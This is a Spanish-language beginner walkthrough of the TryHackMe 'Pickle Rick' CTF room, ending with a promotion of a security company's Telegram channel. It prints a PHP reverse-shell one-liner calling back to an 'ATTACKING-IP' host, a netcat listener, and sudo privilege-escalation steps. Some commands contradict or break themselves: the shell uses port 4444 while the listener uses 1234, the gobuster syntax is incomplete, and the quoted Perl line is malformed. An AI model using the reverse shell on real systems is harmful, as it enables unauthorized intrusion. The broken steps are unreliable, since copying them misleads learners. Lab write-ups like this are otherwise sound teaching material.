En este manual, te guiaré a través de los pasos necesarios para realizar un pentesting en la máquina “Pickle Rick Try Hack Me https://tryhackme.com/room/picklerick“. Este tutorial está dirigido a personas que se están iniciando en el pentesting, por lo que explicaré los puntos más importantes y te mostraré cómo utilizar las herramientas clave durante el proceso. Asegúrate de seguir cada paso cuidadosamente para obtener resultados exitosos.

Paso 1: Actualizar el sistema operativo

Antes de comenzar con el pentesting, es crucial asegurarse de tener el sistema operativo actualizado. Ejecuta el siguiente comando para actualizar el sistema y sus paquetes a las versiones más recientes disponibles:

apt update && apt upgrade

Este comando garantiza que estés utilizando las últimas actualizaciones de seguridad y las versiones más recientes de los paquetes.

Paso 2: Preparar el entorno para Pickle Rick Try Hack Me

Crea una carpeta dedicada para trabajar con la máquina y asegúrate de tener todos los archivos relacionados en ella. Por ejemplo:

mkdir maquina
cd maquina

Esto creará una carpeta llamada “maquina” y te moverá al directorio recién creado.

Paso 3: Recopilar datos en un archivo de texto

Durante el proceso de pentesting, es esencial mantener un registro de los datos que encuentres. Crea un archivo de texto nuevo para almacenar la información relevante. Por ejemplo:

touch datos.txt

Esto creará un archivo de texto llamado “datos.txt” que puedes utilizar para guardar y organizar los hallazgos importantes.

Paso 4: Añadir la IP de la máquina al archivo host para Pickle Rick Try Hack Me

Para facilitar el acceso a la máquina, agregaremos su dirección IP al archivo de hosts de nuestro sistema. Esto se puede lograr modificando el archivo /etc/hosts y agregando una entrada para la dirección IP de la máquina.

Paso 5: Verificar la conectividad y el TTL

Antes de comenzar el escaneo de puertos, es importante verificar la conectividad con la máquina víctima y obtener información básica sobre ella. Utiliza el siguiente comando para enviar un paquete de ping a la dirección IP de la máquina:

ping -c 1 <ipmaquina>

Esto enviará un único paquete de ping a la dirección IP especificada. Luego, puedes verificar el TTL (Time To Live) en la respuesta del ping para obtener información adicional sobre la máquina.

Pickle Rick Try Hack Me Ping

Paso 6: Escaneo inicial con nmap de Pickle Rick Try Hack Me

El siguiente paso es realizar un escaneo inicial de puertos en la máquina utilizando la herramienta nmap. Ejecuta el siguiente comando:

nmap -A <ipmaquina> -oN nmap_picklerick_inicial

Este comando ejecuta un escaneo detallado de todos los puertos abiertos en la máquina y guarda los resultados en un archivo llamado “nmap_picklerick_inicial”. El parámetro -A activa la detección de versiones y la detección de servicios.

Pickle Rick Try Hack Me Nmap

Paso 7: Inspeccionar directorios con Gobuster

Para descubrir posibles directorios ocultos o archivos en la web de la máquina, utilizaremos la herramienta Gobuster. Ejecuta el

siguiente comando:

gobuster -u http://<ipmaquina> -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,sh,txt,cgi,html,css,js,py

Este comando realiza un escaneo utilizando una lista de palabras clave contenida en el archivo “directory-list-2.3-medium.txt”. La herramienta buscará archivos con las extensiones php, sh, txt, cgi, html, css, js y py.

Pickle Rick Try Hack Me Gobuster

Paso 8: Acceder a archivos encontrados y realizar inyección de comandos

Después de realizar el escaneo con Gobuster, es posible que hayas encontrado archivos como “robots.txt” y “login.php”. Accede a estos archivos utilizando un navegador web o herramientas como curl o wget. Si encuentras una posible contraseña en alguno de los archivos, tómala nota y guárdala en tu archivo de datos para referencia futura.

Pickle Rick Try Hack Me Username
Pickle Rick Try Hack Me Password

Paso 9: Realizar un shell inverso en Pickle Rick Try Hack Me

Si has identificado un punto de inyección de comandos en la máquina, puedes aprovecharlo para establecer un shell inverso. Utiliza el siguiente comando PHP, reemplazando “ATTACKING-IP” por tu dirección IP de ataque:

php -r '$sock=fsockopen("ATTACKING-IP",4444);exec("/bin/sh -i <&4 >&4 2>&4");'

Este comando abrirá una conexión de red hacia tu máquina y ejecutará un shell interactivo en la máquina víctima.

Pickle Rick Try Hack Me Php Reverse Shell

Paso 10: Escuchar el shell inverso

En tu máquina de ataque, abre un programa como Netcat para escuchar la conexión de shell inverso. Utiliza el siguiente comando:

nc -nvlp 1234

Esto abrirá una escucha en el puerto 1234 para recibir la conexión de shell inverso desde la máquina víctima.

Pickle Rick Try Hack Me Netcat

Paso 11: Elevar los privilegios a root

Una vez dentro de la máquina víctima a través del shell inverso, ejecuta el siguiente comando para ver las opciones de sudo disponibles:

sudo -l

Esto mostrará las opciones de sudo disponibles para el usuario actual. En este caso tenemos elevación de privilegios con perl y el archivo backup.pl

cat backup.pl #!/usr/bin/perl
system("sh, "/etc/copy.sh");

Ahora tendrás control total sobre la máquina como root.

Pickle Rick Try Hack Me Sudo

Paso 12: Búsqueda de ingredientes Pickle Rick Try Hack Me

Como usuario root en la máquina víctima, realiza una búsqueda de los tres ingredientes necesarios en los directorios relevantes utilizando comandos como find o grep. Guarda todos los hallazgos en tu archivo de datos para referencia futura.

¡Enhorabuena! Has completado el proceso de pentesting y has hackeado con éxito la máquina Pickle Rick.

Resumen

En este tutorial, hemos seguido una serie de pasos para realizar un pentesting en la máquina Pickle Rick. Comenzamos actualizando el sistema operativo, configurando el entorno de trabajo y recopilando datos en un archivo de texto. Luego, realizamos un escaneo de puertos con nmap, inspeccionamos directorios con Gobuster y accedimos a archivos encontrados. Utilizamos un shell inverso para obtener acceso a la máquina víctima, elevamos nuestros privilegios a root y buscamos los ingredientes necesarios. Al seguir estos pasos, logramos hackear con éxito la máquina Pickle Rick y obtener control total sobre ella.

¡Únete a DCSeguridad en Telegram!

Si estás interesado en el campo de la ciberseguridad y deseas obtener más información, te invitamos a unirte a nuestro canal de Telegram. En DCSeguridad, nos especializamos en ofrecer soluciones y servicios de seguridad avanzados para proteger tus activos digitales. No dudes en ponerse en contacto con nosotros para obtener asesoramiento o ayuda con tus necesidades de seguridad.

¡Asegúrate de visitar nuestro sitio web para obtener más información!